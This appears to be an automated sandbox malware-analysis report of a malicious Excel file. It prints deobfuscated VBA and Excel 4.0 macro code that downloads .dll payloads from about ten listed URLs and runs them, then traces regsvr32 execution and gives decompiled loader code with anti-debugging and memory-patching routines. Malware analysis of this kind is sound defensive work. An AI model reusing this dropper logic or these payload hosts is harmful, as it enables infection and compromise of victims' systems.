Replace("SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll")","?","https://www.urban-mosaic.com/ana58n.zip") -> SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll") Replace("SET.NAME("w00",b0b)","?","http://suddisagara.com/y755j7515.zip") -> SET.NAME("w00",b0b) Replace("SET.NAME("ba",".")","?","http://cooltcat.com/hiytvys.rar") -> SET.NAME("ba",".") Replace("CANCEL.KEY(TRUE)","?","https://viralizi.id/pme1b4.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00)","?","https://dom-chel74.ru/ymuyks.rar") -> SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00) Replace("SET.NAME("v0","O")","?","http://laboratoriostabbler.com/c942pn.rar") -> SET.NAME("v0","O") Replace("SET.NAME("wegb","URLM"&v0&"N")","?","http://bahia.consultoriass.es/xka8p2.rar") -> SET.NAME("wegb","URLM"&v0&"N")
Part of subcall function ecimovert@Module1: Int
Part of subcall function ecimovert@Module1: UBound
Part of subcall function ecimovert@Module1: Rnd
Split
MsgBox
Run	Run("moreP_ab") Run("moreP_ab")

Strings	Decrypted Strings
"!"
""""
"="
"?"
"="
"?"
""""

Line	Instruction	Meta Information
7	Function pagesREviewsd(optional wq as Integer) as Integer
8	Dim O as Integer	executed
8	Dim Oa as Integer
8	ol = 1
9	Sheets(ol).Cells(homepodd, ol).Name = bycilke & "ab"	Cells
10	Dim MiV(44563)
11	For Each sem in ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)	SpecialCells xlCellTypeConstants
12	MiV(sem.value) = Chr(sem.Row)	value Chr Row
13	Next	SpecialCells xlCellTypeConstants
14	For Each nog in MiV
15	govs = govs + nog
16	Next
17	Oa = 9
17	kij = Split(govs, "!")	Split
17	Ada = Split(kij(ol), yellowsto(homepodd))	Split
18	For Each Vo in Ada
19	Sheets(ol).Cells(homepodd, ol).value = "=" & Replace(Vo, "?", ecimovert(Split(kij(0), yellowsto(Oa))))	Cells Replace("SET.NAME("b0b",CHAR(101))","?","http://truxiellogroup.com/d0l359.rar") -> SET.NAME("b0b",CHAR(101)) Split executed
20	On Error Resume Next
21	MsgBox (Run("" & bycilke & "ab"))	MsgBox Run("moreP_ab") executed
22	Next
22	Oa = 2
23	End Function

Function yellowsto, APIs: 0, Strings: 3, Number of lines: 6, Relevance: 3.756

Strings	Decrypted Strings
"$"
"]"
"]"

Line	Instruction	Meta Information
33	Function yellowsto(yel as Integer)
34	yellowsto = "$"	executed
35	If yel = 2 Then
35	yellowsto = "]"
35	Endif
36	End Function

Function ecimovert, APIs: 3, Strings: 0, Number of lines: 5, Relevance: 3.755

APIs	Meta Information
Int
UBound
Rnd

Line	Instruction	Meta Information
27	Function ecimovert(nimo as Variant) as String
27	Randomize:	executed
28	df = 2 - 1
28	ecimovert = nimo(Int((UBound(nimo) + df) * Rnd))	Int UBound Rnd
29	End Function

Function bycilke, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings	Decrypted Strings
"moreP_"

Line	Instruction	Meta Information
24	Function bycilke()
25	bycilke = "moreP_"	executed
26	End Function

Function homepodd, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
3	Function homepodd()
4	homepodd = 5 - 3	executed
5	End Function

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Control = "view_1_a, 1, 0, MSForms, MultiPage"

Executed Functions

Subroutine view_1_a_Layout, APIs: 2, Strings: 0, Number of lines: 4, Relevance: 4.504

APIs	Meta Information
Part of subcall function ResizePagess@Sheet1: OnTime
Part of subcall function ResizePagess@Sheet1: Now

Line	Instruction	Meta Information
13	Private Sub view_1_a_Layout(ByVal Index as Long)
14	a = 488	executed
14	ResizePagess
15	End Sub

Subroutine ResizePagess, APIs: 2, Strings: 1, Number of lines: 3, Relevance: 4.503

APIs	Meta Information
OnTime
Now

Strings	Decrypted Strings
"pages""REviewsd"

Line	Instruction	Meta Information
10	Sub ResizePagess()
11	Application.OnTime Now, "pages" & "REviewsd"	OnTime Now executed
12	End Sub

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: regsvr32.exe PID: 1108 Parent PID: 1552 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	98.8%
Signature Coverage:	52.5%
Total number of Nodes:	909
Total number of Limit Nodes:	55

Executed Functions

Function 001FB770, Relevance: 65.0, APIs: 3, Strings: 34, Instructions: 297memorynativeCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 001FB7C1
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 001FB8C3
NtSetInformationProcess.NTDLL(000000FF,00000022,00000002,00000004), ref: 001FBB0D

Strings

n, xrefs: 001FBAC1
e, xrefs: 001FBA61
w, xrefs: 001FBAB1
e, xrefs: 001FBA95
NtSetInformationProcess, xrefs: 001FBAE7, 001FBAEA
r, xrefs: 001FBAB9
s, xrefs: 001FBA4D
t, xrefs: 001FBA81
e, xrefs: 001FBA7D
s, xrefs: 001FBA99
c, xrefs: 001FBA91
., xrefs: 001FBA65
e, xrefs: 001FBAC5
ntdll.dll, xrefs: 001FBAD5, 001FBAD8
r, xrefs: 001FBA5D
A, xrefs: 001FBAAD
l, xrefs: 001FBA6D
o, xrefs: 001FBA59
i, xrefs: 001FBAA9
d, xrefs: 001FBA69
l, xrefs: 001FBA71
a, xrefs: 001FBAB5
r, xrefs: 001FBA89
s, xrefs: 001FBA9D
c, xrefs: 001FBA55
h, xrefs: 001FBA51
s, xrefs: 001FBACD
o, xrefs: 001FBA8D
D, xrefs: 001FBAA1
s, xrefs: 001FBAC9
p, xrefs: 001FBAA5
S, xrefs: 001FBA79
P, xrefs: 001FBA85
e, xrefs: 001FBABD

Memory Dump Source

Source File: 00000004.00000002.2382019410.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c0000_regsvr32.jbxd

Similarity

API ID: AllocVirtual$InformationProcess
String ID: .$A$D$NtSetInformationProcess$P$S$a$c$c$d$e$e$e$e$e$h$i$l$l$n$ntdll.dll$o$o$p$r$r$r$s$s$s$s$s$t$w
API String ID: 909339949-3052210031
Opcode ID: 7615b4bbff0c0f42055e6e706df41e7549d44994621ed4abba162dec9ff077f5
Instruction ID: dc2989b8ee61851032b3a3a6660cc50bf67cf0041a1c0976fee133292cf9bcc5
Opcode Fuzzy Hash: 7615b4bbff0c0f42055e6e706df41e7549d44994621ed4abba162dec9ff077f5
Instruction Fuzzy Hash: FDE12174D08288DFDB05CF98C494BEEBBB1BF59304F148158E5486F382C3BAA955CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 001FBA14, Relevance: 63.1, APIs: 1, Strings: 35, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtSetInformationProcess.NTDLL(000000FF,00000022,00000002,00000004), ref: 001FBB0D

Strings

n, xrefs: 001FBAC1
e, xrefs: 001FBA61
w, xrefs: 001FBAB1
e, xrefs: 001FBA95
NtSetInformationProcess, xrefs: 001FBAE7, 001FBAEA
r, xrefs: 001FBAB9
s, xrefs: 001FBA4D
t, xrefs: 001FBA81
e, xrefs: 001FBA7D
s, xrefs: 001FBA99
c, xrefs: 001FBA91
d, xrefs: 001FB9DC
., xrefs: 001FBA65
e, xrefs: 001FBAC5
ntdll.dll, xrefs: 001FBAD5, 001FBAD8
r, xrefs: 001FBA5D
A, xrefs: 001FBAAD
l, xrefs: 001FBA6D
o, xrefs: 001FBA59
i, xrefs: 001FBAA9
d, xrefs: 001FBA69
l, xrefs: 001FBA71
a, xrefs: 001FBAB5
r, xrefs: 001FBA89
s, xrefs: 001FBA9D
c, xrefs: 001FBA55
h, xrefs: 001FBA51
s, xrefs: 001FBACD
o, xrefs: 001FBA8D
D, xrefs: 001FBAA1
s, xrefs: 001FBAC9
p, xrefs: 001FBAA5
S, xrefs: 001FBA79
P, xrefs: 001FBA85
e, xrefs: 001FBABD

Memory Dump Source

Source File: 00000004.00000002.2382019410.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c0000_regsvr32.jbxd

Similarity

API ID: InformationProcess
String ID: .$A$D$NtSetInformationProcess$P$S$a$c$c$d$d$e$e$e$e$e$h$i$l$l$n$ntdll.dll$o$o$p$r$r$r$s$s$s$s$s$t$w
API String ID: 1801817001-421981078
Opcode ID: 337eff46f0da924312ede1d48c41eb9bcbe58776a410a7f9917d169e86c4faa5
Instruction ID: 3267dfc53d5bb25445de055d2a14b6b7bc74988d2e68ae9ae4a777d15d316fcf
Opcode Fuzzy Hash: 337eff46f0da924312ede1d48c41eb9bcbe58776a410a7f9917d169e86c4faa5
Instruction Fuzzy Hash: AA515D20D0C3C8D9EB12C6E8D4587DDBFB21B22748F18419895882F296C7FF1569C77A

Uniqueness

Uniqueness Score: -1.00%

Function 00465150, Relevance: 30.6, APIs: 14, Strings: 3, Instructions: 826
sleepCOMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00465150() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t173;
				signed int _t175;
				signed int _t184;
				signed int _t186;
				signed int _t192;
				signed int _t194;
				void* _t197;
				signed int _t205;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr* _t238;
				void* _t253;
				void* _t263;
				intOrPtr _t266;
				signed int _t276;
				signed int _t280;
				void* _t295;
				intOrPtr* _t296;
				signed int _t299;
				unsigned int _t303;
				intOrPtr _t306;
				signed short* _t307;
				signed int _t310;
				signed int _t327;
				signed int _t328;
				signed int _t333;
				char* _t341;
				char _t343;
				signed int _t354;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				signed int _t374;
				void* _t379;
				signed int _t380;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t430;
				intOrPtr* _t438;
				signed int _t453;
				signed int _t455;
				signed int _t458;
				signed int _t490;
				signed int _t492;
				signed int _t504;
				signed int _t505;
				signed int _t525;
				signed int _t534;
				void* _t539;
				signed int _t540;
				signed int _t548;
				intOrPtr* _t549;
				void* _t552;
				intOrPtr _t555;
				intOrPtr _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				intOrPtr* _t562;

				_push(_t537);
				_push(_t533);
				_t562 = _t561 - 0x204;
				_push(1);
				E00477980(_t562 + 0x12c);
				_t173 = E004715C0(0xa1310f65, 0x755128fe);
				if(_t173 == 0) {
					 *0x49b1b5 = 0;
					 *0x49b1ad = 0;
					 *0x49b1b1 = 0;
					 *0x49b1b9 = 0;
					 *0x49b1bd = 0;
					__eflags =  *0x49b026 & 0x000000ff;
					if(( *0x49b026 & 0x000000ff) != 0) {
						E00485CB0(_t562 + 0xdc, 3, 0x28, 0x64);
						_t382 = 0;
						__eflags = 0;
						_t557 = _t562 + 0x1e4;
						while(1) {
							L4:
							E00485CB0(_t557, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1e4));
							Sleep(0xa);
							E00480B10(_t557);
							_t382 = _t382 + 1;
							__eflags = _t382 - 0xbebbe7c;
							if(_t382 >= 0xbebbe7c) {
								break;
							} else {
								goto L5;
							}
							while(1) {
								L5:
								__eflags = _t382 - 0x137b;
								if(_t382 < 0x137b) {
									goto L4;
								}
								_t382 = _t382 + 1;
								__eflags = _t382 - 0xbebbe7c;
								if(_t382 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L8;
							}
						}
						L8:
						_t383 = 0;
						__eflags = 0;
						_t558 = _t562 + 0x1ec;
						while(1) {
							L9:
							E00485CB0(_t558, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1ec));
							Sleep(0xa);
							E00480B10(_t558);
							_t383 = _t383 + 1;
							__eflags = _t383 - 0xbebbe7c;
							if(_t383 >= 0xbebbe7c) {
								break;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								__eflags = _t383 - 0x137b;
								if(_t383 < 0x137b) {
									goto L9;
								}
								_t383 = _t383 + 1;
								__eflags = _t383 - 0xbebbe7c;
								if(_t383 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L13;
							}
						}
						L13:
						_t384 = 0;
						__eflags = 0;
						_t559 = _t562 + 0x1f4;
						while(1) {
							L14:
							E00485CB0(_t559, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1f4));
							Sleep(0xa);
							E00480B10(_t559);
							_t384 = _t384 + 1;
							__eflags = _t384 - 0xbebbe7c;
							if(_t384 >= 0xbebbe7c) {
								break;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								__eflags = _t384 - 0x137b;
								if(_t384 < 0x137b) {
									goto L14;
								}
								_t384 = _t384 + 1;
								__eflags = _t384 - 0xbebbe7c;
								if(_t384 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L18;
							}
						}
						L18:
						_t385 = 0;
						__eflags = 0;
						_t560 = _t562 + 0x1fc;
						while(1) {
							L19:
							E00485CB0(_t560, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1fc));
							Sleep(0xa);
							E00480B10(_t560);
							_t385 = _t385 + 1;
							__eflags = _t385 - 0xbebbe7c;
							if(_t385 >= 0xbebbe7c) {
								break;
							} else {
								goto L20;
							}
							while(1) {
								L20:
								__eflags = _t385 - 0x137b;
								if(_t385 < 0x137b) {
									goto L19;
								}
								_t385 = _t385 + 1;
								__eflags = _t385 - 0xbebbe7c;
								if(_t385 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L23;
							}
						}
						L23:
						E00480B10(_t562 + 0xd4);
					}
					_push(0x755aa3f0);
					_t175 = E00477560();
					__eflags = _t175;
					if(_t175 != 0) {
						_t341 = E004715C0(0x588ab3ea, 0x1be15feb);
						__eflags =  *_t341 - 0xe9;
						if( *_t341 == 0xe9) {
							_t150 =  *((intOrPtr*)(_t341 + 1)) + 5; // 0x5
							_t379 = _t341 + _t150;
							_t490 = E004715C0(0x588ab3ea, 0x3b4caff7);
							__eflags = _t490;
							if(_t490 == 0) {
								L139:
								_t555 =  *0x499414; // 0x3f7883
								_t343 =  *0x49941a; // -16
								 *((intOrPtr*)(_t562 + 0xdc)) = _t555;
								 *((short*)(_t562 + 0xe0)) =  *0x499418 & 0x0000ffff;
								 *((char*)(_t562 + 0xe2)) = _t343;
								_t537 =  *(_t562 + 0x6c);
								_t556 =  *((intOrPtr*)(_t562 + 0x78));
								while(1) {
									_push(0x3f);
									_push(7);
									_push(_t562 + 0xe4);
									_t380 = E00470DA0(_t537, _t556);
									__eflags = _t380;
									if(_t380 == 0) {
										goto L26;
									}
									 *(_t562 + 0xec) = _t380;
									 *((intOrPtr*)(_t562 + 0xf0)) = 0x10;
									_t556 = _t556 -  ~_t537 + _t380 + 7;
									 *((intOrPtr*)(_t562 + 0xf4)) = 0x40;
									_t161 = _t380 + 7; // 0x7
									_t537 = _t161;
									_t492 = E004715C0(0x588ab3ea, 0x649746ec);
									__eflags = _t492;
									if(_t492 != 0) {
										_t533 = _t562 + 0xf0;
										 *_t492(0xffffffff, _t562 + 0xec, _t562 + 0xf0,  *((intOrPtr*)(_t562 + 0xf8)), _t562 + 0xf4);
									}
									 *((char*)(_t380 + 5)) = 0x90;
									 *((char*)(_t380 + 4)) = 0x90;
									_t525 = E004715C0(0x588ab3ea, 0x649746ec);
									__eflags = _t525;
									if(_t525 != 0) {
										_t533 = _t562 + 0xec;
										 *_t525(0xffffffff, _t562 + 0xec, _t562 + 0xf0,  *((intOrPtr*)(_t562 + 0xf8)), _t562 + 0xf4);
									}
								}
								goto L26;
							} else {
								_t354 =  *_t490(0xffffffff, _t379, 0, _t562 + 0x6c, 0x1c, 0);
								__eflags = _t354;
								if(_t354 != 0) {
									goto L26;
								} else {
									goto L139;
								}
							}
							goto L145;
						}
					}
					L26:
					E00461270(_t533, _t537);
					 *((intOrPtr*)(_t562 + 0x12c)) = 0x2800;
					_push(0x2800);
					E00489350(_t562 + 0xfc);
					_t548 = E00489640(_t562 + 0xfc, 0);
					_t504 = E004715C0(0xd93f3271, 0xa1ee59b);
					__eflags = _t504;
					if(_t504 != 0) {
						 *_t504(_t548, _t562 + 0x12c); // executed
					}
					__eflags = _t548;
					if(_t548 != 0) {
						_t537 = 0x4b005452;
						do {
							__eflags =  *((intOrPtr*)(_t548 + 0x194)) - _t537 | ( *(_t548 + 0x198) & 0x0000ffff) - 0x000031a1;
							if(( *((intOrPtr*)(_t548 + 0x194)) - _t537 | ( *(_t548 + 0x198) & 0x0000ffff) - 0x000031a1) == 0) {
								E00465150();
							}
							_t548 =  *_t548;
							__eflags = _t548;
						} while (_t548 != 0);
					}
					E00489510(_t562 + 0xf8);
					E00478810(_t562 + 0x108, 0);
					 *0x49b1c8 = _t562 + 0x108;
					_t184 = E004715C0(0xa1310f65, 0xe10858ef);
					__eflags = _t184;
					if(_t184 == 0) {
						__eflags = 0;
						_t186 = E004715C0(0x1b47f147, 0x4c00b324);
						__eflags = _t186;
						if(_t186 == 0) {
							 *0x49b1d0 = 0;
							_t549 = E00473930(0, 0, _t533, _t537);
							__eflags =  *_t549 - 0x10;
							if( *_t549 < 0x10) {
								E00465150();
							}
							E00466020(0);
							E00478810(_t562 + 0x114, 0x200);
							_t505 = E004715C0(0xa1310f65, 0xc4d11e8a);
							__eflags = _t505;
							if(_t505 != 0) {
								_t333 =  *(_t562 + 0x114) >> 1;
								__eflags = _t333;
								 *_t505(0,  *(_t562 + 0x114), _t333);
							}
							E00472580(_t562 + 0x118, _t533, _t537);
							_t192 = E00479C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0x118)));
							__eflags = _t192;
							if(_t192 == 0) {
								E00472780(_t562 + 0xe4, _t533, _t537);
								_t194 = E00479C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0xe4)));
								__eflags = _t194;
								if(_t194 == 0) {
									E00472580(_t562 + 0xb4, _t533, _t537);
									_t537 = _t562 + 0x98;
									E0047D980(_t562 + 0xbc, _t562 + 0x98, 0x5c);
									_t197 = E00487600(_t562 + 0x98, 2);
									E0046AC00(_t562 + 0xbc, 6);
									E00478CC0(_t197,  *((intOrPtr*)(_t562 + 0xbc)));
									E00478CA0(_t562 + 0xbc);
									E004889F0(_t537, _t562 + 0x124, 0x5c);
									E00488910(_t537, _t533, _t537);
									E00478CA0(_t562 + 0xb4);
									_t205 = E00479C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0x120)));
									__eflags = _t205;
									_t47 = _t205 > 0;
									__eflags = _t47;
									_t369 = 0 | _t47;
									E00478CA0(_t562 + 0x120);
								} else {
									_t369 = 1;
								}
								E00478CA0(_t562 + 0xe4);
								E00478CA0(_t562 + 0x118);
								__eflags = _t369;
								if(_t369 == 0) {
									_t370 = 0;
									__eflags = 0;
								} else {
									goto L48;
								}
							} else {
								E00478CA0(_t562 + 0x118);
								L48:
								_t370 = 1;
							}
							E0046AC00(_t562 + 0x120, 2);
							E0047D980(_t562 + 0x128, _t562 + 0x130, 0x7e);
							E00478CA0(_t562 + 0x120);
							__eflags =  *(_t562 + 0x130);
							if( *(_t562 + 0x130) > 0) {
								 *_t562 = _t549;
								__eflags = 0;
								_t534 = _t562 + 0x130;
								while(1) {
									L52:
									_t327 = E004715C0(0xa1310f65, 0xf3af54a7);
									__eflags = _t327;
									if(_t327 != 0) {
										LoadLibraryW( *(E00487600(_t534, _t537))); // executed
									}
									_t328 =  *(_t562 + 0x130);
									while(1) {
										L55:
										_t537 = 1;
										__eflags = 1 - _t328;
										if(1 >= _t328) {
											break;
										}
										__eflags = 1 - 4;
										if(1 != 4) {
											goto L52;
										} else {
											_t508 =  *0x49b02a & 0x000000ff;
											__eflags = ( *0x49b02a & 0x000000ff) - 2;
											if(( *0x49b02a & 0x000000ff) == 2) {
												continue;
											} else {
												while(1) {
													L52:
													_t327 = E004715C0(0xa1310f65, 0xf3af54a7);
													__eflags = _t327;
													if(_t327 != 0) {
														LoadLibraryW( *(E00487600(_t534, _t537))); // executed
													}
													_t328 =  *(_t562 + 0x130);
													goto L55;
												}
											}
										}
										goto L60;
									}
									_t549 =  *_t562;
									goto L60;
								}
							}
							L60:
							__eflags =  *((intOrPtr*)(_t549 + 0x2c)) - 2;
							if( *((intOrPtr*)(_t549 + 0x2c)) != 2) {
								__eflags =  *0x49b028 & 0x000000ff;
								if(( *0x49b028 & 0x000000ff) == 0) {
									__eflags =  *0x49b265 & 0x000000ff;
									if(( *0x49b265 & 0x000000ff) == 0) {
										__eflags =  *0x49b1cc - 1;
										if( *0x49b1cc != 1) {
											_t306 =  *0x49b1d0; // 0x3877c8
											_t62 = _t306 + 4; // 0x3877da
											_t307 =  *_t62;
											_t508 =  *_t307 & 0x0000ffff;
											__eflags = ( *_t307 & 0x0000ffff) - 0x2d;
											if(( *_t307 & 0x0000ffff) != 0x2d) {
												E00478AB0(_t562 + 0xcc, _t307, 0);
												_push(0x80);
												_push(0);
												E0048A4E0(_t562 + 0x68, __eflags,  *((intOrPtr*)(_t562 + 0xd0)), 1);
												_t310 = E0048BEA0(_t562 + 0x64, _t508, _t537);
												__eflags = _t310;
												if(_t310 == 0) {
													__eflags =  *((char*)(_t562 + 0x68));
													if( *((char*)(_t562 + 0x68)) != 0) {
														E0048BE30(_t562 + 0x64, _t537);
													}
													E00478CA0(_t562 + 0x58);
													_t540 = 0;
													__eflags = 0;
													while(1) {
														__eflags = E0048A730(_t562 + 0xc4, _t508);
														if(__eflags == 0) {
															break;
														}
														E004722A0(0x64, _t508);
														_t540 = _t540 + 1;
														__eflags = _t540 - 0x64;
														if(__eflags < 0) {
															continue;
														}
														break;
													}
													_t537 = _t562 + 0xcc;
													do {
														E0047AE80(_t562 + 0xcc, __eflags, _t537, 0x5c);
														E00478CC0(_t562 + 0xc8,  *(_t562 + 0xcc));
														E00478CA0(_t537);
														__eflags = E0048A730(_t562 + 0xc4, _t508);
													} while (__eflags == 0);
												} else {
													__eflags =  *((char*)(_t562 + 0x68));
													if( *((char*)(_t562 + 0x68)) != 0) {
														E0048BE30(_t562 + 0x64, _t537);
													}
													E00478CA0(_t562 + 0x58);
												}
												E00478CA0(_t562 + 0xc4);
											}
										}
									}
								}
								__eflags = ( *0x49b02a & 0x000000ff) - 2;
								if(( *0x49b02a & 0x000000ff) == 2) {
									L89:
									_t215 =  *0x49b1ad; // 0x26b1f98
									__eflags = _t215;
									if(_t215 == 0) {
										L91:
										_t216 =  *0x49b1ad; // 0x26b1f98
										__eflags = _t216;
										if(_t216 == 0) {
											_push(0x10);
											_t217 = E00471030();
											_t562 = _t562 + 4;
											__eflags = _t217;
											if(_t217 != 0) {
												_push(0);
												_t218 = E00489350(_t217);
											} else {
												_t218 = 0;
											}
											 *0x49b1ad = _t218;
										}
										_t537 =  *0x49b1ad; // 0x26b1f98
										__eflags = ( *0x49b02a & 0x000000ff) - 1;
										if(( *0x49b02a & 0x000000ff) == 1) {
											_t508 = 0x18f8c844;
											_t534 = _t562 + 0x28;
											E00466AD0(_t370, _t534, 0x18f8c844, _t534, _t537, 1, 0); // executed
											_push(_t534);
											E00489520(_t537);
											E00489510(_t534);
										} else {
											E00489710(_t537, 0x49b02d,  *0x49b02b & 0x0000ffff);
										}
									} else {
										_t455 =  *0x49b1ad; // 0x26b1f98
										_t280 = E00489660(_t455);
										__eflags = _t280;
										if(_t280 != 0) {
											goto L91;
										}
									}
									_t223 =  *0x49b1b1; // 0x0
									__eflags = _t223;
									if(_t223 == 0) {
										L97:
										_t224 =  *0x49b1b1; // 0x0
										__eflags = _t224;
										if(_t224 == 0) {
											_push(0x10);
											_t225 = E00471030();
											_t562 = _t562 + 4;
											__eflags = _t225;
											if(_t225 != 0) {
												_push(0);
												_t226 = E00489350(_t225);
											} else {
												_t226 = 0;
											}
											 *0x49b1b1 = _t226;
										}
										_t534 =  *0x49b1b1; // 0x0
										__eflags = ( *0x49b02a & 0x000000ff) - 1;
										if(( *0x49b02a & 0x000000ff) == 1) {
											_t508 = 0x11041f01;
											E00466AD0(_t370, _t562 + 0x38, 0x11041f01, _t534, _t537, 1, 1);
											_push(_t562 + 0x38);
											E00489520(_t534);
											E00489510(_t562 + 0x38);
											_t233 = E00489650(_t534);
											__eflags = _t233;
											if(_t233 != 0) {
												_t508 = 0xd3ef7577;
												E00466AD0(_t370, _t562 + 8, 0xd3ef7577, _t534, _t537, 0, 0);
												E00489510(_t562);
											}
										} else {
											_t537 =  *0x49b1c4; // 0x460000
											__eflags =  *((char*)(E00473930(_t370, 0, _t534, _t537) + 0xb)) - 0x20;
											_t517 =  ==  ? 0x7e839a6 : 0x93fc68d6;
											_t508 = _t537;
											E00469090(_t562 + 0x88, _t537,  ==  ? 0x7e839a6 : 0x93fc68d6);
											_push(_t562 + 0x88);
											E00489520(_t534);
											E00489510(_t562 + 0x88);
										}
									} else {
										_t453 =  *0x49b1b1; // 0x0
										_t276 = E00489660(_t453);
										__eflags = _t276;
										if(_t276 != 0) {
											goto L97;
										}
									}
									_t234 =  *((intOrPtr*)(_t549 + 0x2c));
									__eflags = _t234 - 3;
									if(_t234 == 3) {
										__eflags =  *0x49b1cc - 3;
										if( *0x49b1cc == 3) {
											_t235 =  *0x49b1d0; // 0x3877c8
											_t146 = _t235 + 8; // 0x3877e0
											E00478CC0(_t562 + 0x10c,  *_t146);
										}
										_t371 = _t562 + 0x48;
										E00478810(_t562 + 0x48, 0);
										_t238 = E00479890(_t371, _t562 + 0x48, _t508, _t534, _t537, _t371, 0x499428,  *((intOrPtr*)(_t549 + 0x2c)));
										E00480220(_t562 + 0x110,  *_t238, 0);
										E00478CA0(_t371);
										E00468180(_t537);
									} else {
										__eflags = _t234 - 5;
										if(_t234 != 5) {
											__eflags = _t234 - 6;
											if(__eflags == 0) {
												_t430 = _t562 + 0xa4;
												 *_t430 = 0;
												 *((intOrPtr*)(_t430 + 4)) = 0;
												 *((intOrPtr*)(_t430 + 8)) = 0;
												 *((intOrPtr*)(_t430 + 0xc)) = 0;
												E00475B60(_t370, _t430, _t534, _t537, __eflags);
												E00466740(_t562 + 0xa4);
												E00471350(0x12);
												__eflags =  *(_t562 + 0xa8);
												if( *(_t562 + 0xa8) > 0) {
													_t373 = 0;
													__eflags = 0;
													do {
														_t253 = E00492B00(_t562 + 0xa8, _t373);
														__eflags =  *((char*)(_t253 + 0x3c));
														if( *((char*)(_t253 + 0x3c)) == 0) {
															E00462A40(_t562 + 0x50, _t253);
															E00478CA0(_t562 + 0x50);
														}
														_t373 = _t373 + 1;
														__eflags = _t373 -  *(_t562 + 0xa8);
													} while (_t373 <  *(_t562 + 0xa8));
												}
												E00492970(_t370, _t562 + 0xa4, _t534);
												_t434 =  *(_t562 + 0xb0);
												__eflags =  *(_t562 + 0xb0);
												if( *(_t562 + 0xb0) != 0) {
													E00462A20(_t434, 1);
												}
											}
										} else {
											__eflags = _t370;
											if(_t370 == 0) {
												__eflags =  *0x49b1cc - 1;
												if(__eflags <= 0) {
													L106:
													_t438 = _t562 + 0x18;
													 *_t438 = 0;
													 *((intOrPtr*)(_t438 + 4)) = 0;
													 *((intOrPtr*)(_t438 + 8)) = 0;
													 *((intOrPtr*)(_t438 + 0xc)) = 0;
													E00475B60(_t370, _t438, _t534, _t537, __eflags);
													__eflags = ( *0x49b029 & 0x000000ff) - 1;
													E00467DB0(_t562 + 0x18, 0 | ( *0x49b029 & 0x000000ff) - 0x00000001 > 0x00000000);
													__eflags =  *0x49b029 & 0x000000ff;
													if(( *0x49b029 & 0x000000ff) != 0) {
														E00471350(0x12);
														__eflags =  *(_t562 + 0x1c);
														if( *(_t562 + 0x1c) > 0) {
															_t374 = 0;
															__eflags = 0;
															do {
																_t263 = E00492B00(_t562 + 0x1c, _t374);
																__eflags =  *((char*)(_t263 + 0x3c));
																if( *((char*)(_t263 + 0x3c)) == 0) {
																	E00462A40(_t562 + 0x10, _t263);
																	E00478CA0(_t562 + 0x10);
																}
																_t374 = _t374 + 1;
																__eflags = _t374 -  *(_t562 + 0x1c);
															} while (_t374 <  *(_t562 + 0x1c));
														}
													}
